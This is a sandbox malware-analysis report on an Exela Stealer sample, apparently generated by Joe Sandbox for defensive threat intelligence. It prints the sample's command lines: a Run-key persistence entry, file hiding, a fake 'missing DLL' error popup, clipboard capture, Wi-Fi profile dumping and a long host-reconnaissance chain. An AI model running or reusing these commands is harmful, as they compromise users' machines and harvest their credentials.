Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
Analysis ID:1431281
MD5:d53e9b9d10affcf90e613abccc702ca2
SHA1:24849b1a515347a75804d53c483ce6dffc78dbcc
SHA256:0bcfadb848694ee56bf3fad6c3a9df4fde2d60cd52ce2a16be42b06fda520812
Tags:exe
Infos:

Detection

Exela Stealer, Python Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Add file from suspicious location to autostart registry
Sigma detected: Capture Wi-Fi password
Yara detected Exela Stealer
Yara detected Python Stealer
Detected generic credential text file
Found many strings related to Crypto-Wallets (likely being stolen)
Gathers network related connection and port information
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Modifies the windows firewall
Overwrites the password of the administrator account
Performs a network lookup / discovery via ARP
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
Sigma detected: MSHTA Suspicious Execution 01
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses attrib.exe to hide files
Uses ipconfig to lookup or modify the Windows network settings
Uses netsh to modify the Windows network and firewall settings
Uses netstat to query active network connections and open ports
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Console CodePage Lookup Via CHCP
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe (PID: 6760 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe" MD5: D53E9B9D10AFFCF90E613ABCCC702CA2)
    • SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe (PID: 6816 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe" MD5: D53E9B9D10AFFCF90E613ABCCC702CA2)
      • cmd.exe (PID: 6932 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7116 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 3732 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7140 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 5428 cmdline: wmic computersystem get Manufacturer MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7160 cmdline: C:\Windows\system32\cmd.exe /c "gdb --version" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3228 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 6168 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 2004 cmdline: C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 3980 cmdline: wmic path Win32_ComputerSystem get Manufacturer MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 6936 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 6600 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • Conhost.exe (PID: 5480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6984 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7080 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7016 cmdline: C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 5812 cmdline: attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 1076 cmdline: C:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe" /f" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7120 cmdline: reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 7092 cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • mshta.exe (PID: 7072 cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • cmd.exe (PID: 4592 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7104 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7044 cmdline: C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 3320 cmdline: cmd.exe /c chcp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • chcp.com (PID: 7040 cmdline: chcp MD5: 33395C4732A49065EA72590B14B64F32)
      • cmd.exe (PID: 7112 cmdline: C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 3696 cmdline: cmd.exe /c chcp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • chcp.com (PID: 2132 cmdline: chcp MD5: 33395C4732A49065EA72590B14B64F32)
      • cmd.exe (PID: 2476 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7080 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7096 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6988 cmdline: powershell.exe Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7224 cmdline: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 7312 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
          • WmiPrvSE.exe (PID: 7400 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • HOSTNAME.EXE (PID: 7516 cmdline: hostname MD5: 33AFAA43B84BDEAB12E02F9DBD2B2EE0)
        • WMIC.exe (PID: 7536 cmdline: wmic logicaldisk get caption,description,providername MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • net.exe (PID: 7652 cmdline: net user MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 7668 cmdline: C:\Windows\system32\net1 user MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • query.exe (PID: 7684 cmdline: query user MD5: 29043BC0B0F99EAFF36CAD35CBEE8D45)
          • quser.exe (PID: 7700 cmdline: "C:\Windows\system32\quser.exe" MD5: 480868AEBA9C04CA04D641D5ED29937B)
        • net.exe (PID: 7716 cmdline: net localgroup MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 7732 cmdline: C:\Windows\system32\net1 localgroup MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • net.exe (PID: 7748 cmdline: net localgroup administrators MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 7764 cmdline: C:\Windows\system32\net1 localgroup administrators MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • net.exe (PID: 7780 cmdline: net user guest MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 7796 cmdline: C:\Windows\system32\net1 user guest MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • net.exe (PID: 7816 cmdline: net user administrator MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 7832 cmdline: C:\Windows\system32\net1 user administrator MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • WMIC.exe (PID: 7848 cmdline: wmic startup get caption,command MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • tasklist.exe (PID: 7880 cmdline: tasklist /svc MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • ipconfig.exe (PID: 7908 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)
        • ROUTE.EXE (PID: 7932 cmdline: route print MD5: 3C97E63423E527BA8381E81CBA00B8CD)
        • ARP.EXE (PID: 7948 cmdline: arp -a MD5: 2AF1B2C042B83437A4BE82B19749FA98)
        • NETSTAT.EXE (PID: 7964 cmdline: netstat -ano MD5: 7FDDD6681EA81CE26E64452336F479E6)
        • sc.exe (PID: 7980 cmdline: sc query type= service state= all MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • netsh.exe (PID: 7996 cmdline: netsh firewall show state MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
        • netsh.exe (PID: 8024 cmdline: netsh firewall show config MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 7232 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 7320 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
  • svchost.exe (PID: 7596 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • Exela.exe (PID: 8068 cmdline: "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe" MD5: D53E9B9D10AFFCF90E613ABCCC702CA2)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ExelaStealerYara detected Exela StealerJoe Security
    00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PythonStealerYara detected Python StealerJoe Security
      00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_PythonStealerYara detected Python StealerJoe Security
          00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_ExelaStealerYara detected Exela StealerJoe Security
            Click to see the 16 entries

            System Summary

            barindex
            Source: Process startedAuthor: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule): Data: Command: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()", CommandLine: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()", CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7092, ParentProcessName: cmd.exe, ProcessCommandLine: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()", ProcessId: 7072, ProcessName: mshta.exe
            Source: Process startedAuthor: _pete_0, TheDFIRReport: Data: Command: chcp, CommandLine: chcp, CommandLine|base64offset|contains: r), Image: C:\Windows\System32\chcp.com, NewProcessName: C:\Windows\System32\chcp.com, OriginalFileName: C:\Windows\System32\chcp.com, ParentCommandLine: cmd.exe /c chcp, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3320, ParentProcessName: cmd.exe, ProcessCommandLine: chcp, ProcessId: 7040, ProcessName: chcp.com
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 7120, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela Update Service
            Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe" /f, CommandLine: reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe" /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe" /f", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1076, ParentProcessName: cmd.exe, ProcessCommandLine: reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe" /f, ProcessId: 7120, ProcessName: reg.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe" /f", CommandLine: C:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe" /f", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, ParentProcessId: 6816, ParentProcessName: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe" /f", ProcessId: 1076, ProcessName: cmd.exe
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, ParentProcessId: 6816, ParentProcessName: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", ProcessId: 7096, ProcessName: cmd.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems): Data: Command: net localgroup administrators, CommandLine: net localgroup administrators, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7224, ParentProcessName: cmd.exe, ProcessCommandLine: net localgroup administrators, ProcessId: 7748, ProcessName: net.exe
            Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: net user, CommandLine: net user, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7224, ParentProcessName: cmd.exe, ProcessCommandLine: net user, ProcessId: 7652, ProcessName: net.exe
            Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net user, CommandLine: net user, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7224, ParentProcessName: cmd.exe, ProcessCommandLine: net user, ProcessId: 7652, ProcessName: net.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe Get-Clipboard, CommandLine: powershell.exe Get-Clipboard, CommandLine|base64offset|contains: ~Xn, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7096, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe Get-Clipboard, ProcessId: 6988, ProcessName: powershell.exe
            Source: Process startedAuthor: frack113: Data: Command: sc query type= service state= all, CommandLine: sc query type= service state= all, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7224, ParentProcessName: cmd.exe, ProcessCommandLine: sc query type= service state= all, ProcessId: 7980, ProcessName: sc.exe
